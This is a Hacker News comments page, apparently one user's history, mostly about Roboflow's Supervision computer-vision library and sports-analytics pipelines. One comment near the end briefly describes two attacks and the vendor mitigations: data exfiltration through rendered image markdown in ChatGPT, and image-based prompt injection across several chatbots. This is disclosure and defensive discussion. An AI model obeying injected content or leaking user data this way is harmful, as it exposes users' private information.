Hacker Newsnew | past | comments | ask | show | jobs | submit | SkalskiP's commentslogin

code: https://colab.research.google.com/github/roboflow-ai/noteboo...

- player and number detection with RF-DETR

- player tracking with SAM2

- team clustering with SigLIP, UMAP and K-Means

- number recognition with SmolVLM2

- perspective conversion with homography

- player trajectory correction

- shot detection and classification


use computer vision to automatically extract player and ball position, plot it on pitch radar, and calculate advanced metrics


yup! the point here is to show step by step how to perform video segmentation with SAM2


Hi! Supervision does not run models, but it connects to existing detection and segmentation libraries, allowing you to do more advanced stuff easily. Take a look here to get a high-level overview: https://supervision.roboflow.com/latest/how_to/detect_and_an....

As for Roboflow, you can use the `inference` package to run (among other things) all Roboflow Universe models locally. Take a look at README examples: https://github.com/roboflow/inference.


Thank you!


You can always slice the images into smaller ones, run detection on each tile, and combine results. Supervision has a utility for this - https://supervision.roboflow.com/latest/detection/tools/infe..., but it only works with detections. You can get a much more accurate result this way. Here is some side-by-side comparison: https://github.com/roboflow/supervision/releases/tag/0.14.0.


Hi swyx! The easiest way would be to train a custom model to detect raised hands. I found one on Roboflow - https://universe.roboflow.com/search?q=raised%20hand. I'm not sure how good it would be on your images, so I'd recommend adding some of your pictures. Then you just detect hands and detect people and calculate the ratio.


Hi everyone! I'm one of the maintainers of Supervision. Thanks for putting our project on the HN front page. It really made my day!


Hi @eloisus! I'm the creator of Supervision. Over the years, I've noticed that there are certain code snippets I find myself rewriting for each of my computer vision projects. My friends in the field have expressed similar frustrations. While OpenCV is fantastic, it can be verbose, and its API is often inconsistent and hard to remember.

Regarding "drawing detections on an image or video," we aim for maximum flexibility. We offer 18 different annotators for detection and segmentation models, available at https://supervision.roboflow.com/latest/annotators. Each annotator is customizable and can be combined with others. Moreover, we strive to simplify the integration of these annotators with the most popular computer vision libraries.

Edit: I just check your LinkedIn. I think we met on CVPR last year.


Totally agree on OpenCV's Python API being hard to use. If your goals are to build something as foundational as OpenCV, but with a Python-native interface I'd be excited about that.

I hope I don't come off as critical, I appreciate the work you're doing. I'd really like to see this take off. My only point is that tasks like annotating a video with tracking are things I've only seen in demos. If I could custom-order the reusable parts I want, it would include geometry, camera transforms, lens distortion, etc. Your polygon zone filtering looks imminently useful. Maybe I should shut up and just contribute something.

I remember meeting you! Maybe I'll see you in Seattle this year.


Oh my, if you'd like to contribute lens distortion removal... That would make me super happy!

I'm 95% sure I'll be in Seattle this year.


Hi @simonw your tweets were motivation for me to write this blogpost. Same with this one: https://blog.roboflow.com/chatgpt-code-interpreter-computer-... when I dove deep into Code Interpreter. Most of my jailbreaking and prompt injection adventures are linked to you. Thanks a lot!


Great to see this getting more traction.

Two things I wanted to add:

1) The image markdown data exfil was disclosed to OpenAI in April this year, but still no fix. It impacts all areas of ChatGPT (e.g. browsing, plugins, code interpreter - beta features) and now image analysis (a default feature). Other vendors have fixed this attack vector via stricter Content-Security-Policy (e.g Bing Chat) or not rendering image markdown.

2) Image based injection work across models, e.g. also applies to Bard and Bing Chat. There was a brief discussion on here in July about it (https://news.ycombinator.com/item?id=36718721) about a first demo.


It's a good explanation - the more people writing about this stuff the better!


You are asking in the context of this blogpost?


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: